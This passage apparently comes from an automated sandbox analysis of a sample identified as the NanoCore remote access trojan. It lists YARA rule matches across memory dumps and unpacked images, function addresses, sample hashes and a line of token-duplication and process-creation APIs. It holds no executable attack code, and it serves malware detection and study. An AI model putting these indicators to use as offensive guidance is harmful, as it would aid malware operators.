    Source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.386537145.00000000047F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.386537145.00000000047F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000019.00000002.391670186.0000000003411000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.383169195.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383169195.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.385532540.00000000010C3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.385532540.00000000010C3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000019.00000002.391832360.0000000004419000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.386511135.000000000478A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.386511135.000000000478A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.383645453.000000000485B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383645453.000000000485B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.386616181.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.386616181.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.383202245.0000000004721000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383202245.0000000004721000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.383407849.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383407849.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001E.00000002.406011428.0000000000D02000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001E.00000002.406011428.0000000000D02000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.383348180.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383348180.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000005.00000002.560258652.0000000005630000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.383504563.00000000047F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383504563.00000000047F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001E.00000002.411732283.00000000033A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.386566314.00000000047F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.386566314.00000000047F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.386381872.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.386381872.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001E.00000002.412114966.00000000043A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.383082558.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383082558.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.383597669.0000000004828000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383597669.0000000004828000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020626D0_2_0020626D
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001F83C00_2_001F83C0
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0021C0B00_2_0021C0B0
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001F30FC0_2_001F30FC
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_002101130_2_00210113
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020F3CA0_2_0020F3CA
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_002033D30_2_002033D3
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001FE5100_2_001FE510
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_002105480_2_00210548
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0021C55E0_2_0021C55E
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001FF5C50_2_001FF5C5
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020364E0_2_0020364E
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_002206540_2_00220654
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_002066A20_2_002066A2
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001F26920_2_001F2692
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020589E0_2_0020589E
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020F8C60_2_0020F8C6
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020397F0_2_0020397F
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001FE9730_2_001FE973
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001FDADD0_2_001FDADD
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001FBAD10_2_001FBAD1
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_00213CBA0_2_00213CBA
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_00206CDB0_2_00206CDB
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020FCDE0_2_0020FCDE
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001F5D7E0_2_001F5D7E
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001F3EAD0_2_001F3EAD
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_00213EE90_2_00213EE9
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001FDF120_2_001FDF12
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011335F04_2_011335F0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011398F04_2_011398F0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011421364_2_01142136
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0114A1374_2_0114A137
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117F3A64_2_0117F3A6
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0115427D4_2_0115427D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011425084_2_01142508
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117655F4_2_0117655F
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011398F04_2_011398F0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0113F7304_2_0113F730
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011437214_2_01143721
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011419034_2_01141903
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0115088F4_2_0115088F
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0114C8CE4_2_0114C8CE
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011428F04_2_011428F0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01153BA14_2_01153BA1
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011AEA2B4_2_011AEA2B
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117EAD54_2_0117EAD5
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01172D2D4_2_01172D2D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01141D984_2_01141D98
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01150DE04_2_01150DE0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01151F2C4_2_01151F2C
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117CE8D4_2_0117CE8D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01174EB74_2_01174EB7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0502E4715_2_0502E471
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0502E4805_2_0502E480
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0502BBD45_2_0502BBD4
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_065703F05_2_065703F0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0114213610_2_01142136
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0114A13710_2_0114A137
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117F3A610_2_0117F3A6
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0115427D10_2_0115427D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0114250810_2_01142508
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117655F10_2_0117655F
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011398F010_2_011398F0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011335F010_2_011335F0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0113F73010_2_0113F730
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0114372110_2_01143721
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0114190310_2_01141903
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0115088F10_2_0115088F
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0114C8CE10_2_0114C8CE
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011398F010_2_011398F0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011428F010_2_011428F0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01153BA110_2_01153BA1
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011AEA2B10_2_011AEA2B
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117EAD510_2_0117EAD5
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01172D2D10_2_01172D2D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01141D9810_2_01141D98
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01150DE010_2_01150DE0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01151F2C10_2_01151F2C
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117CE8D10_2_0117CE8D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01174EB710_2_01174EB7
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_011335F020_2_011335F0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_011398F020_2_011398F0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0114A13720_2_0114A137
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0115427D20_2_0115427D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0117655F20_2_0117655F
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0113F73020_2_0113F730
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0114372120_2_01143721
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0114190320_2_01141903
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0115088F20_2_0115088F
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0114C8CE20_2_0114C8CE
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01153BA120_2_01153BA1
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01172D2D20_2_01172D2D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01150DE020_2_01150DE0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01151F2C20_2_01151F2C
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0117CE8D20_2_0117CE8D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01174EB720_2_01174EB7
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01176219 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,4_2_01176219
    Source: cjlaro.pif.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeSection loaded: dxgidebug.dllJump to behavior
    Source: dUzAkYsvl8.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: 5.2.RegSvcs.exe.2a67f10.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.2a67f10.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 5.2.RegSvcs.exe.3a807ce.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.3a807ce.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.6110000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.6110000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
